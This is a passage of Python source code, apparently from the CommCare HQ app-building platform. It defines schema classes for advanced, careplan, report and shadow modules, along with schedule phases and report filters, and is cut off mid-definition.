if validate_module:
errors.extend(module.get_case_errors(
needs_case_type=False,
needs_case_detail=module.requires_case_details(),
needs_referral_detail=False,
))
return errors
def get_case_updates(self, case_type):
updates = set()
format_key = self.get_case_property_name_formatter()
for action in self.actions.get_all_actions():
if action.case_type == case_type:
updates.update(format_key(*item)
for item in action.case_properties.iteritems())
if self.schedule and self.schedule.enabled and self.source:
xform = self.wrapped_xform()
self.add_stuff_to_xform(xform)
scheduler_updates = xform.get_scheduler_case_updates()[case_type]
else:
scheduler_updates = set()
return updates.union(scheduler_updates)
@memoized
def get_parent_types_and_contributed_properties(self, module_case_type, case_type):
parent_types = set()
case_properties = set()
for subcase in self.actions.get_subcase_actions():
if subcase.case_type == case_type:
case_properties.update(
subcase.case_properties.keys()
)
for case_index in subcase.case_indices:
parent = self.actions.get_action_from_tag(case_index.tag)
if parent:
parent_types.add((parent.case_type, case_index.reference_id or 'parent'))
return parent_types, case_properties
def update_app_case_meta(self, app_case_meta):
from corehq.apps.reports.formdetails.readable import FormQuestionResponse
questions = {
q['value']: FormQuestionResponse(q)
for q in self.get_questions(self.get_app().langs, include_translations=True)
}
for action in self.actions.load_update_cases:
for name, question_path in action.case_properties.items():
self.add_property_save(
app_case_meta,
action.case_type,
name,
questions,
question_path
)
for question_path, name in action.preload.items():
self.add_property_load(
app_case_meta,
action.case_type,
name,
questions,
question_path
)
if action.close_condition.is_active():
meta = app_case_meta.get_type(action.case_type)
meta.add_closer(self.unique_id, action.close_condition)
for action in self.actions.open_cases:
self.add_property_save(
app_case_meta,
action.case_type,
'name',
questions,
action.name_path,
action.open_condition
)
for name, question_path in action.case_properties.items():
self.add_property_save(
app_case_meta,
action.case_type,
name,
questions,
question_path,
action.open_condition
)
meta = app_case_meta.get_type(action.case_type)
meta.add_opener(self.unique_id, action.open_condition)
if action.close_condition.is_active():
meta.add_closer(self.unique_id, action.close_condition)
class SchedulePhaseForm(IndexedSchema):
"""
A reference to a form in a schedule phase.
"""
form_id = FormIdProperty("modules[*].schedule_phases[*].forms[*].form_id")
class SchedulePhase(IndexedSchema):
"""
SchedulePhases are attached to a module.
A Schedule Phase is a grouping of forms that occur within a period and share an anchor
A module should not have more than one SchedulePhase with the same anchor
anchor: Case property containing a date after which this phase becomes active
forms: The forms that are to be filled out within this phase
"""
anchor = StringProperty()
forms = SchemaListProperty(SchedulePhaseForm)
@property
def id(self):
""" A Schedule Phase is 1-indexed """
_id = super(SchedulePhase, self).id
return _id + 1
@property
def phase_id(self):
return "{}_{}".format(self.anchor, self.id)
def get_module(self):
return self._parent
_get_forms = IndexedSchema.Getter('forms')
def get_forms(self):
"""Returns the actual form objects related to this phase"""
module = self.get_module()
return (module.get_form_by_unique_id(form.form_id) for form in self._get_forms())
def get_form(self, desired_form):
return next((form for form in self.get_forms() if form.unique_id == desired_form.unique_id), None)
def get_phase_form_index(self, form):
"""
Returns the index of the form with respect to the phase
schedule_phase.forms = [a,b,c]
schedule_phase.get_phase_form_index(b)
=> 1
schedule_phase.get_phase_form_index(c)
=> 2
"""
return next((phase_form.id for phase_form in self._get_forms() if phase_form.form_id == form.unique_id),
None)
def remove_form(self, form):
"""Remove a form from the phase"""
idx = self.get_phase_form_index(form)
if idx is None:
raise ScheduleError("That form doesn't exist in the phase")
self.forms.remove(self.forms[idx])
def add_form(self, form):
"""Adds a form to this phase, removing it from other phases"""
old_phase = form.get_phase()
if old_phase is not None and old_phase.anchor != self.anchor:
old_phase.remove_form(form)
if self.get_form(form) is None:
self.forms.append(SchedulePhaseForm(form_id=form.unique_id))
def change_anchor(self, new_anchor):
if new_anchor is None or new_anchor.strip() == '':
raise ScheduleError(_("You can't create a phase without an anchor property"))
self.anchor = new_anchor
if self.get_module().phase_anchors.count(new_anchor) > 1:
raise ScheduleError(_("You can't have more than one phase with the anchor {}").format(new_anchor))
class AdvancedModule(ModuleBase):
module_type = 'advanced'
case_label = DictProperty()
forms = SchemaListProperty(AdvancedForm)
case_details = SchemaProperty(DetailPair)
product_details = SchemaProperty(DetailPair)
put_in_root = BooleanProperty(default=False)
case_list = SchemaProperty(CaseList)
has_schedule = BooleanProperty()
schedule_phases = SchemaListProperty(SchedulePhase)
get_schedule_phases = IndexedSchema.Getter('schedule_phases')
search_config = SchemaProperty(CaseSearch)
@classmethod
def new_module(cls, name, lang):
detail = Detail(
columns=[DetailColumn(
format='plain',
header={(lang or 'en'): ugettext("Name")},
field='name',
model='case',
)]
)
module = AdvancedModule(
name={(lang or 'en'): name or ugettext("Untitled Module")},
forms=[],
case_type='',
case_details=DetailPair(
short=Detail(detail.to_json()),
long=Detail(detail.to_json()),
),
product_details=DetailPair(
short=Detail(
columns=[
DetailColumn(
format='plain',
header={(lang or 'en'): ugettext("Product")},
field='name',
model='product',
),
],
),
long=Detail(),
),
)
module.get_or_create_unique_id()
return module
def new_form(self, name, lang, attachment=''):
form = AdvancedForm(
name={lang if lang else "en": name if name else _("Untitled Form")},
)
form.schedule = FormSchedule(enabled=False)
self.forms.append(form)
form = self.get_form(-1)
form.source = attachment
return form
def add_insert_form(self, from_module, form, index=None, with_source=False):
if isinstance(form, AdvancedForm):
new_form = form
elif isinstance(form, Form):
new_form = AdvancedForm(
name=form.name,
form_filter=form.form_filter,
media_image=form.media_image,
media_audio=form.media_audio
)
new_form._parent = self
form._parent = self
if with_source:
new_form.source = form.source
actions = form.active_actions()
open = actions.get('open_case', None)
update = actions.get('update_case', None)
close = actions.get('close_case', None)
preload = actions.get('case_preload', None)
subcases = actions.get('subcases', None)
case_type = from_module.case_type
base_action = None
if open:
base_action = AdvancedOpenCaseAction(
case_type=case_type,
case_tag='open_{0}_0'.format(case_type),
name_path=open.name_path,
open_condition=open.condition,
case_properties=update.update if update else {},
)
new_form.actions.open_cases.append(base_action)
elif update or preload or close:
base_action = LoadUpdateAction(
case_type=case_type,
case_tag='load_{0}_0'.format(case_type),
case_properties=update.update if update else {},
preload=preload.preload if preload else {}
)
if from_module.parent_select.active:
app = self.get_app()
select_chain = get_select_chain(app, from_module, include_self=False)
for n, link in enumerate(reversed(list(enumerate(select_chain)))):
i, module = link
new_form.actions.load_update_cases.append(LoadUpdateAction(
case_type=module.case_type,
case_tag='_'.join(['parent'] * (i + 1)),
details_module=module.unique_id,
case_index=CaseIndex(tag='_'.join(['parent'] * (i + 2)) if n > 0 else '')
))
base_action.case_indices = [CaseIndex(tag='parent')]
if close:
base_action.close_condition = close.condition
new_form.actions.load_update_cases.append(base_action)
if subcases:
for i, subcase in enumerate(subcases):
open_subcase_action = AdvancedOpenCaseAction(
case_type=subcase.case_type,
case_tag='open_{0}_{1}'.format(subcase.case_type, i+1),
name_path=subcase.case_name,
open_condition=subcase.condition,
case_properties=subcase.case_properties,
repeat_context=subcase.repeat_context,
case_indices=[CaseIndex(
tag=base_action.case_tag if base_action else '',
reference_id=subcase.reference_id,
)]
)
new_form.actions.open_cases.append(open_subcase_action)
else:
raise IncompatibleFormTypeException()
if index:
self.forms.insert(index, new_form)
else:
self.forms.append(new_form)
return self.get_form(index or -1)
def rename_lang(self, old_lang, new_lang):
super(AdvancedModule, self).rename_lang(old_lang, new_lang)
self.case_list.rename_lang(old_lang, new_lang)
def requires_case_details(self):
if self.case_list.show:
return True
for form in self.forms:
if any(action.case_type == self.case_type for action in form.actions.load_update_cases):
return True
def all_forms_require_a_case(self):
return all(form.requires_case() for form in self.forms)
def get_details(self):
return (
('case_short', self.case_details.short, True),
('case_long', self.case_details.long, True),
('product_short', self.product_details.short, self.get_app().commtrack_enabled),
('product_long', self.product_details.long, False),
)
def get_case_errors(self, needs_case_type, needs_case_detail, needs_referral_detail=False):
module_info = self.get_module_info()
if needs_case_type and not self.case_type:
yield {
'type': 'no case type',
'module': module_info,
}
if needs_case_detail:
if not self.case_details.short.columns:
yield {
'type': 'no case detail',
'module': module_info,
}
if self.get_app().commtrack_enabled and not self.product_details.short.columns:
for form in self.forms:
if self.case_list.show or \
any(action.show_product_stock for action in form.actions.load_update_cases):
yield {
'type': 'no product detail',
'module': module_info,
}
break
columns = self.case_details.short.columns + self.case_details.long.columns
if self.get_app().commtrack_enabled:
columns += self.product_details.short.columns
errors = self.validate_detail_columns(columns)
for error in errors:
yield error
def validate_for_build(self):
errors = super(AdvancedModule, self).validate_for_build()
if not self.forms and not self.case_list.show:
errors.append({
'type': 'no forms or case list',
'module': self.get_module_info(),
})
if self.case_list_form.form_id:
forms = self.forms
case_tag = None
loaded_case_types = None
for form in forms:
info = self.get_module_info()
form_info = {"id": form.id if hasattr(form, 'id') else None, "name": form.name}
non_auto_select_actions = [a for a in form.actions.load_update_cases if not a.auto_select]
this_forms_loaded_case_types = {action.case_type for action in non_auto_select_actions}
if loaded_case_types is None:
loaded_case_types = this_forms_loaded_case_types
elif loaded_case_types != this_forms_loaded_case_types:
errors.append({
'type': 'all forms in case list module must load the same cases',
'module': info,
'form': form_info,
})
if not non_auto_select_actions:
errors.append({
'type': 'case list module form must require case',
'module': info,
'form': form_info,
})
elif len(non_auto_select_actions) != 1:
for index, action in reversed(list(enumerate(non_auto_select_actions))):
if (
index > 0 and
non_auto_select_actions[index - 1].case_tag not in (p.tag for p in action.case_indices)
):
errors.append({
'type': 'case list module form can only load parent cases',
'module': info,
'form': form_info,
})
case_action = non_auto_select_actions[-1] if non_auto_select_actions else None
if case_action and case_action.case_type != self.case_type:
errors.append({
'type': 'case list module form must match module case type',
'module': info,
'form': form_info,
})
# set case_tag if not already set
case_tag = case_action.case_tag if not case_tag and case_action else case_tag
if case_action and case_action.case_tag != case_tag:
errors.append({
'type': 'all forms in case list module must have same case management',
'module': info,
'form': form_info,
'expected_tag': case_tag
})
if case_action and case_action.details_module and case_action.details_module != self.unique_id:
errors.append({
'type': 'forms in case list module must use modules details',
'module': info,
'form': form_info,
})
return errors
def _uses_case_type(self, case_type, invert_match=False):
return any(form.uses_case_type(case_type, invert_match) for form in self.forms)
def uses_usercase(self):
"""Return True if this module has any forms that use the usercase.
"""
return self._uses_case_type(USERCASE_TYPE)
@property
def phase_anchors(self):
return [phase.anchor for phase in self.schedule_phases]
def get_or_create_schedule_phase(self, anchor):
"""Returns a tuple of (phase, new?)"""
if anchor is None or anchor.strip() == '':
raise ScheduleError(_("You can't create a phase without an anchor property"))
phase = next((phase for phase in self.get_schedule_phases() if phase.anchor == anchor), None)
is_new_phase = False
if phase is None:
self.schedule_phases.append(SchedulePhase(anchor=anchor))
# TODO: is there a better way of doing this?
phase = list(self.get_schedule_phases())[-1] # get the phase from the module so we know the _parent
is_new_phase = True
return (phase, is_new_phase)
def _clear_schedule_phases(self):
self.schedule_phases = []
def update_schedule_phases(self, anchors):
""" Take a list of anchors, reorders, deletes and creates phases from it """
old_phases = {phase.anchor: phase for phase in self.get_schedule_phases()}
self._clear_schedule_phases()
for anchor in anchors:
try:
self.schedule_phases.append(old_phases.pop(anchor))
except KeyError:
self.get_or_create_schedule_phase(anchor)
deleted_phases_with_forms = [anchor for anchor, phase in old_phases.iteritems() if len(phase.forms)]
if deleted_phases_with_forms:
raise ScheduleError(_("You can't delete phases with anchors "
"{phase_anchors} because they have forms attached to them").format(
phase_anchors=(", ").join(deleted_phases_with_forms)))
return self.get_schedule_phases()
def update_schedule_phase_anchors(self, new_anchors):
""" takes a list of tuples (id, new_anchor) and updates the phase anchors """
for anchor in new_anchors:
id = anchor[0] - 1
new_anchor = anchor[1]
try:
list(self.get_schedule_phases())[id].change_anchor(new_anchor)
except IndexError:
pass # That phase wasn't found, so we can't change it's anchor. Ignore it
class CareplanForm(IndexedFormBase, NavMenuItemMediaMixin):
form_type = 'careplan_form'
mode = StringProperty(required=True, choices=['create', 'update'])
custom_case_updates = DictProperty()
case_preload = DictProperty()
@classmethod
def wrap(cls, data):
if cls is CareplanForm:
doc_type = data['doc_type']
if doc_type == 'CareplanGoalForm':
return CareplanGoalForm.wrap(data)
elif doc_type == 'CareplanTaskForm':
return CareplanTaskForm.wrap(data)
else:
raise ValueError('Unexpected doc_type for CareplanForm', doc_type)
else:
return super(CareplanForm, cls).wrap(data)
def add_stuff_to_xform(self, xform, build_profile_id=None):
super(CareplanForm, self).add_stuff_to_xform(xform, build_profile_id)
xform.add_care_plan(self)
def get_case_updates(self, case_type):
if case_type == self.case_type:
format_key = self.get_case_property_name_formatter()
return [format_key(*item) for item in self.case_updates().iteritems()]
else:
return []
def get_case_type(self):
return self.case_type
def get_parent_case_type(self):
return self._parent.case_type
def get_parent_types_and_contributed_properties(self, module_case_type, case_type):
parent_types = set()
case_properties = set()
if case_type == self.case_type:
if case_type == CAREPLAN_GOAL:
parent_types.add((module_case_type, 'parent'))
elif case_type == CAREPLAN_TASK:
parent_types.add((CAREPLAN_GOAL, 'goal'))
case_properties.update(self.case_updates().keys())
return parent_types, case_properties
def is_registration_form(self, case_type=None):
return self.mode == 'create' and (not case_type or self.case_type == case_type)
def update_app_case_meta(self, app_case_meta):
from corehq.apps.reports.formdetails.readable import FormQuestionResponse
questions = {
q['value']: FormQuestionResponse(q)
for q in self.get_questions(self.get_app().langs, include_translations=True)
}
meta = app_case_meta.get_type(self.case_type)
for name, question_path in self.case_updates().items():
self.add_property_save(
app_case_meta,
self.case_type,
name,
questions,
question_path
)
for name, question_path in self.case_preload.items():
self.add_property_load(
app_case_meta,
self.case_type,
name,
questions,
question_path
)
meta.add_opener(self.unique_id, FormActionCondition(
type='always',
))
meta.add_closer(self.unique_id, FormActionCondition(
type='if',
question=self.close_path,
answer='yes',
))
class CareplanGoalForm(CareplanForm):
case_type = CAREPLAN_GOAL
name_path = StringProperty(required=True, default='/data/name')
date_followup_path = StringProperty(required=True, default='/data/date_followup')
description_path = StringProperty(required=True, default='/data/description')
close_path = StringProperty(required=True, default='/data/close_goal')
@classmethod
def new_form(cls, lang, name, mode):
action = 'Update' if mode == 'update' else 'New'
form = CareplanGoalForm(mode=mode)
name = name or '%s Careplan %s' % (action, CAREPLAN_CASE_NAMES[form.case_type])
form.name = {lang: name}
if mode == 'update':
form.description_path = '/data/description_group/description'
source = load_form_template('%s_%s.xml' % (form.case_type, mode))
return form, source
def case_updates(self):
changes = self.custom_case_updates.copy()
changes.update({
'date_followup': self.date_followup_path,
'description': self.description_path,
})
return changes
def get_fixed_questions(self):
def q(name, case_key, label):
return {
'name': name,
'key': case_key,
'label': label,
'path': self[name]
}
questions = [
q('description_path', 'description', _('Description')),
q('date_followup_path', 'date_followup', _('Followup date')),
]
if self.mode == 'create':
return [q('name_path', 'name', _('Name'))] + questions
else:
return questions + [q('close_path', 'close', _('Close if'))]
class CareplanTaskForm(CareplanForm):
case_type = CAREPLAN_TASK
name_path = StringProperty(required=True, default='/data/task_repeat/name')
date_followup_path = StringProperty(required=True, default='/data/date_followup')
description_path = StringProperty(required=True, default='/data/description')
latest_report_path = StringProperty(required=True, default='/data/progress_group/progress_update')
close_path = StringProperty(required=True, default='/data/task_complete')
@classmethod
def new_form(cls, lang, name, mode):
action = 'Update' if mode == 'update' else 'New'
form = CareplanTaskForm(mode=mode)
name = name or '%s Careplan %s' % (action, CAREPLAN_CASE_NAMES[form.case_type])
form.name = {lang: name}
if mode == 'create':
form.date_followup_path = '/data/task_repeat/date_followup'
form.description_path = '/data/task_repeat/description'
source = load_form_template('%s_%s.xml' % (form.case_type, mode))
return form, source
def case_updates(self):
changes = self.custom_case_updates.copy()
changes.update({
'date_followup': self.date_followup_path,
})
if self.mode == 'create':
changes['description'] = self.description_path
else:
changes['latest_report'] = self.latest_report_path
return changes
def get_fixed_questions(self):
def q(name, case_key, label):
return {
'name': name,
'key': case_key,
'label': label,
'path': self[name]
}
questions = [
q('date_followup_path', 'date_followup', _('Followup date')),
]
if self.mode == 'create':
return [
q('name_path', 'name', _('Name')),
q('description_path', 'description', _('Description')),
] + questions
else:
return questions + [
q('latest_report_path', 'latest_report', _('Latest report')),
q('close_path', 'close', _('Close if')),
]
class CareplanModule(ModuleBase):
"""
A set of forms and configuration for managing the Care Plan workflow.
"""
module_type = 'careplan'
parent_select = SchemaProperty(ParentSelect)
display_separately = BooleanProperty(default=False)
forms = SchemaListProperty(CareplanForm)
goal_details = SchemaProperty(DetailPair)
task_details = SchemaProperty(DetailPair)
@classmethod
def new_module(cls, name, lang, target_module_id, target_case_type):
lang = lang or 'en'
module = CareplanModule(
name={lang: name or ugettext("Care Plan")},
parent_select=ParentSelect(
active=True,
relationship='parent',
module_id=target_module_id
),
case_type=target_case_type,
goal_details=DetailPair(
short=cls._get_detail(lang, 'goal_short'),
long=cls._get_detail(lang, 'goal_long'),
),
task_details=DetailPair(
short=cls._get_detail(lang, 'task_short'),
long=cls._get_detail(lang, 'task_long'),
)
)
module.get_or_create_unique_id()
return module
@classmethod
def _get_detail(cls, lang, detail_type):
header = ugettext('Goal') if detail_type.startswith('goal') else ugettext('Task')
columns = [
DetailColumn(
format='plain',
header={lang: header},
field='name',
model='case'),
DetailColumn(
format='date',
header={lang: ugettext("Followup")},
field='date_followup',
model='case')]
if detail_type.endswith('long'):
columns.append(DetailColumn(
format='plain',
header={lang: ugettext("Description")},
field='description',
model='case'))
if detail_type == 'tasks_long':
columns.append(DetailColumn(
format='plain',
header={lang: ugettext("Last update")},
field='latest_report',
model='case'))
return Detail(type=detail_type, columns=columns)
def add_insert_form(self, from_module, form, index=None, with_source=False):
if isinstance(form, CareplanForm):
if index:
self.forms.insert(index, form)
else:
self.forms.append(form)
return self.get_form(index or -1)
else:
raise IncompatibleFormTypeException()
def requires_case_details(self):
return True
def get_case_types(self):
return set([self.case_type]) | set(f.case_type for f in self.forms)
def get_form_by_type(self, case_type, mode):
for form in self.get_forms():
if form.case_type == case_type and form.mode == mode:
return form
def get_details(self):
return (
('%s_short' % CAREPLAN_GOAL, self.goal_details.short, True),
('%s_long' % CAREPLAN_GOAL, self.goal_details.long, True),
('%s_short' % CAREPLAN_TASK, self.task_details.short, True),
('%s_long' % CAREPLAN_TASK, self.task_details.long, True),
)
def get_case_errors(self, needs_case_type, needs_case_detail, needs_referral_detail=False):
module_info = self.get_module_info()
if needs_case_type and not self.case_type:
yield {
'type': 'no case type',
'module': module_info,
}
if needs_case_detail:
if not self.goal_details.short.columns:
yield {
'type': 'no case detail for goals',
'module': module_info,
}
if not self.task_details.short.columns:
yield {
'type': 'no case detail for tasks',
'module': module_info,
}
columns = self.goal_details.short.columns + self.goal_details.long.columns
columns += self.task_details.short.columns + self.task_details.long.columns
errors = self.validate_detail_columns(columns)
for error in errors:
yield error
def validate_for_build(self):
errors = super(CareplanModule, self).validate_for_build()
if not self.forms:
errors.append({
'type': 'no forms',
'module': self.get_module_info(),
})
return errors
class ReportGraphConfig(DocumentSchema):
graph_type = StringProperty(
choices=[
'bar',
'time',
'xy',
],
default='bar',
required=True,
)
series_configs = DictProperty(DictProperty)
config = DictProperty()
class ReportAppFilter(DocumentSchema):
@classmethod
def wrap(cls, data):
if cls is ReportAppFilter:
doc_type = data['doc_type']
doc_type_to_filter_class = {
'AutoFilter': AutoFilter,
'CustomDataAutoFilter': CustomDataAutoFilter,
'StaticChoiceFilter': StaticChoiceFilter,
'StaticChoiceListFilter': StaticChoiceListFilter,
'StaticDatespanFilter': StaticDatespanFilter,
'CustomDatespanFilter': CustomDatespanFilter,
'CustomMonthFilter': CustomMonthFilter,
'MobileSelectFilter': MobileSelectFilter,
'AncestorLocationTypeFilter': AncestorLocationTypeFilter,
'NumericFilter': NumericFilter,
}
try:
klass = doc_type_to_filter_class[doc_type]
except KeyError:
raise ValueError('Unexpected doc_type for ReportAppFilter', doc_type)
else:
return klass.wrap(data)
else:
return super(ReportAppFilter, cls).wrap(data)
def get_filter_value(self, user, ui_filter):
raise NotImplementedError
def _filter_by_case_sharing_group_id(user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return [
Choice(value=group._id, display=None)
for group in user.get_case_sharing_groups()
]
def _filter_by_location_id(user, ui_filter):
return ui_filter.value(**{ui_filter.name: user.location_id})
def _filter_by_username(user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return Choice(value=user.raw_username, display=None)
def _filter_by_user_id(user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return Choice(value=user._id, display=None)
def _filter_by_parent_location_id(user, ui_filter):
location = user.sql_location
location_parent = location.parent.location_id if location and location.parent else None
return ui_filter.value(**{ui_filter.name: location_parent})
_filter_type_to_func = {
'case_sharing_group': _filter_by_case_sharing_group_id,
'location_id': _filter_by_location_id,
'parent_location_id': _filter_by_parent_location_id,
'username': _filter_by_username,
'user_id': _filter_by_user_id,
}
class AutoFilter(ReportAppFilter):
filter_type = StringProperty(choices=_filter_type_to_func.keys())
def get_filter_value(self, user, ui_filter):
return _filter_type_to_func[self.filter_type](user, ui_filter)
class CustomDataAutoFilter(ReportAppFilter):
custom_data_property = StringProperty()
def get_filter_value(self, user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return Choice(value=user.user_data[self.custom_data_property], display=None)
class StaticChoiceFilter(ReportAppFilter):
select_value = StringProperty()
def get_filter_value(self, user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return [Choice(value=self.select_value, display=None)]
class StaticChoiceListFilter(ReportAppFilter):
value = StringListProperty()
def get_filter_value(self, user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return [Choice(value=string_value, display=None) for string_value in self.value]
class StaticDatespanFilter(ReportAppFilter):
date_range = StringProperty(
choices=[
'last7',
'last30',
'thismonth',
'lastmonth',
'lastyear',
],
required=True,
)
def get_filter_value(self, user, ui_filter):
start_date, end_date = get_daterange_start_end_dates(self.date_range)
return DateSpan(startdate=start_date, enddate=end_date)
class CustomDatespanFilter(ReportAppFilter):
operator = StringProperty(
choices=[
'=',
'<=',
'>=',
'>',
'<',
'between'
],
required=True,
)
date_number = StringProperty(required=True)
date_number2 = StringProperty()
def get_filter_value(self, user, ui_filter):
today = datetime.date.today()
start_date = end_date = None
days = int(self.date_number)
if self.operator == 'between':
days2 = int(self.date_number2)
# allows user to have specified the two numbers in either order
if days > days2:
end = days2
start = days
else:
start = days2
end = days
start_date = today - datetime.timedelta(days=start)
end_date = today - datetime.timedelta(days=end)
elif self.operator == '=':
start_date = end_date = today - datetime.timedelta(days=days)
elif self.operator == '>=':
start_date = None
end_date = today - datetime.timedelta(days=days)
elif self.operator == '<=':
start_date = today - datetime.timedelta(days=days)
end_date = None
elif self.operator == '<':
start_date = today - datetime.timedelta(days=days - 1)
end_date = None
elif self.operator == '>':
start_date = None
end_date = today - datetime.timedelta(days=days + 1)
return DateSpan(startdate=start_date, enddate=end_date)
def is_lte(integer):
def validate(x):
if not x <= integer:
raise BadValueError('Value must be less than or equal to {}'.format(integer))
return validate
def is_gte(integer):
def validate(x):
if not x >= integer:
raise BadValueError('Value must be greater than or equal to {}'.format(integer))
return validate
class CustomMonthFilter(ReportAppFilter):
"""
Filter by months that start on a day number other than 1
See [FB 215656](http://manage.dimagi.com/default.asp?215656)
"""
# Values for start_of_month < 1 specify the number of days from the end of the month. Values capped at
# len(February).
start_of_month = IntegerProperty(
required=True,
validators=(is_gte(-27), is_lte(28))
)
# DateSpan to return i.t.o. number of months to go back
period = IntegerProperty(
default=DEFAULT_MONTH_FILTER_PERIOD_LENGTH,
validators=(is_gte(0),)
)
@classmethod
def wrap(cls, doc):
doc['start_of_month'] = int(doc['start_of_month'])
if 'period' in doc:
doc['period'] = int(doc['period'] or DEFAULT_MONTH_FILTER_PERIOD_LENGTH)
return super(CustomMonthFilter, cls).wrap(doc)
def get_filter_value(self, user, ui_filter):
def get_last_month(this_month):
return datetime.date(this_month.year, this_month.month, 1) - datetime.timedelta(days=1)
def get_last_day(date):
_, last_day = calendar.monthrange(date.year, date.month)
return last_day
# Find the start and end dates of period 0
start_of_month = int(self.start_of_month)
end_date = datetime.date.today()
start_day = start_of_month if start_of_month > 0 else get_last_day(end_date) + start_of_month
end_of_month = end_date if end_date.day >= start_day else get_last_month(end_date)
start_date = datetime.date(end_of_month.year, end_of_month.month, start_day)
# Loop over months backwards for period > 0
for i in range(int(self.period)):
end_of_month = get_last_month(end_of_month)
end_date = start_date - datetime.timedelta(days=1)
start_day = start_of_month if start_of_month > 0 else get_last_day(end_of_month) + start_of_month
start_date = datetime.date(end_of_month.year, end_of_month.month, start_day)
return DateSpan(startdate=start_date, enddate=end_date)
class MobileSelectFilter(ReportAppFilter):
def get_filter_value(self, user, ui_filter):
return None
class AncestorLocationTypeFilter(ReportAppFilter):
ancestor_location_type_name = StringProperty()
def get_filter_value(self, user, ui_filter):
from corehq.apps.locations.models import SQLLocation
try:
ancestor = user.sql_location.get_ancestors(include_self=True).\
get(location_type__name=self.ancestor_location_type_name)
except (AttributeError, SQLLocation.DoesNotExist):
# user.sql_location is None, or location does not have an ancestor of that type
return None
return ancestor.location_id
class NumericFilter(ReportAppFilter):
operator = StringProperty(choices=['=', '!=', '<', '<=', '>', '>=']),
operand = FloatProperty()
@classmethod
def wrap(cls, doc):
doc['operand'] = float(doc['operand'])
return super(NumericFilter, cls).wrap(doc)
def get_filter_value(self, user, ui_filter):
return {
'operator': self.operator,
'operand': self.operand,
}
class ReportAppConfig(DocumentSchema):
"""
Class for configuring how a user configurable report shows up in an app
"""
report_id = StringProperty(required=True)
header = DictProperty()
localized_description = DictProperty()
xpath_description = StringProperty()
use_xpath_description = BooleanProperty(default=False)
graph_configs = DictProperty(ReportGraphConfig)
filters = SchemaDictProperty(ReportAppFilter)
uuid = StringProperty(required=True)
_report = None
def __init__(self, *args, **kwargs):
super(ReportAppConfig, self).__init__(*args, **kwargs)
if not self.uuid:
self.uuid = random_hex()
@classmethod
def wrap(cls, doc):
# for backwards compatibility with apps that have localized or xpath descriptions
old_description = doc.get('description')
if old_description:
if isinstance(old_description, basestring) and not doc.get('xpath_description'):
doc['xpath_description'] = old_description
elif isinstance(old_description, dict) and not doc.get('localized_description'):
doc['localized_description'] = old_description
if not doc.get('xpath_description'):
doc['xpath_description'] = '""'
return super(ReportAppConfig, cls).wrap(doc)
def report(self, domain):
if self._report is None:
from corehq.apps.userreports.models import get_report_config
self._report = get_report_config(self.report_id, domain)[0]
return self._report
class ReportModule(ModuleBase):
"""
Module for user configurable reports
"""
module_type = 'report'
report_configs = SchemaListProperty(ReportAppConfig)
forms = []
_loaded = False
@property
@memoized
def reports(self):
from corehq.apps.userreports.models import get_report_configs
return get_report_configs([r.report_id for r in self.report_configs], self.get_app().domain)
@classmethod
def new_module(cls, name, lang):
module = ReportModule(
name={(lang or 'en'): name or ugettext("Reports")},
case_type='',
)
module.get_or_create_unique_id()
return module
def get_details(self):
from .suite_xml.features.mobile_ucr import ReportModuleSuiteHelper
return ReportModuleSuiteHelper(self).get_details()
def get_custom_entries(self):
from .suite_xml.features.mobile_ucr import ReportModuleSuiteHelper
return ReportModuleSuiteHelper(self).get_custom_entries()
def get_menus(self, supports_module_filter=False):
kwargs = {}
if supports_module_filter:
kwargs['relevant'] = interpolate_xpath(self.module_filter)
menu = suite_models.LocalizedMenu(
id=id_strings.menu_id(self),
menu_locale_id=id_strings.module_locale(self),
media_image=bool(len(self.all_image_paths())),
media_audio=bool(len(self.all_audio_paths())),
image_locale_id=id_strings.module_icon_locale(self),
audio_locale_id=id_strings.module_audio_locale(self),
**kwargs
)
menu.commands.extend([
suite_models.Command(id=id_strings.report_command(config.uuid))
for config in self.report_configs
])
yield menu
def check_report_validity(self):
"""
returns is_valid, valid_report_configs
If any report doesn't exist, is_valid is False, otherwise True
valid_report_configs is a list of all report configs that refer to existing reports
"""
try:
all_report_ids = [report._id for report in self.reports]
valid_report_configs = [report_config for report_config in self.report_configs
if report_config.report_id in all_report_ids]
is_valid = (len(valid_report_configs) == len(self.report_configs))
except ReportConfigurationNotFoundError:
valid_report_configs = [] # assuming that if one report is in a different domain, they all are
is_valid = False
return namedtuple('ReportConfigValidity', 'is_valid valid_report_configs')(
is_valid=is_valid,
valid_report_configs=valid_report_configs
)
def validate_for_build(self):
errors = super(ReportModule, self).validate_for_build()
if not self.check_report_validity().is_valid:
errors.append({
'type': 'report config ref invalid',
'module': self.get_module_info()
})
return errors
class ShadowModule(ModuleBase, ModuleDetailsMixin):
"""
A module that acts as a shortcut to another module. This module has its own
settings (name, icon/audio, filter, etc.) and its own case list/detail, but
inherits case type and forms from its source module.
"""
module_type = 'shadow'
source_module_id = StringProperty()
forms = []
excluded_form_ids = SchemaListProperty()
case_details = SchemaProperty(DetailPair)
ref_details = SchemaProperty(DetailPair)
put_in_root = BooleanProperty(default=False)
case_list = SchemaProperty(CaseList)
referral_list = SchemaProperty(CaseList)
task_list = SchemaProperty(CaseList)
parent_select = SchemaProperty(ParentSelect)
get_forms = IndexedSchema.Getter('forms')
@classmethod
def wrap(cls, data):
data = cls.wrap_details(data)
return super(ShadowModule, cls).wrap(data)
@property
def source_module(self):
if self.source_module_id:
try:
return self._parent.get_module_by_unique_id(self.source_module_id)
except ModuleNotFoundException:
pass
return None
@property
def case_type(self):
if not self.source_module:
return None
return self.source_module.case_type
@property
def requires(self):
if not self.source_module:
return 'none'
return self.source_module.requires
@property
def root_module_id(self):
if not self.source_module:
return None
return self.source_module.root_module_id
def get_suite_forms(self):
if not self.source_module:
return []
return [f for f in self.source_module.get_forms() if f.unique_id not in self.excluded_form_ids]
@parse_int([1])
def get_form(self, i):
return None
def requires_case_details(self):
if not self.source_module:
return False
return self.source_module.requires_case_details()
def get_case_types(self):
if not self.source_module:
return []
return self.source_module.get_case_types()
@memoized
def get_subcase_types(self):
if not self.source_module:
return []
return self.source_module.get_subcase_types()
@memoized
def all_forms_require_a_case(self):
if not self.source_module:
return []
return self.source_module.all_forms_require_a_case()
@classmethod
def new_module(cls, name, lang):
lang = lang or 'en'
detail = Detail(
columns=[DetailColumn(
format='plain',
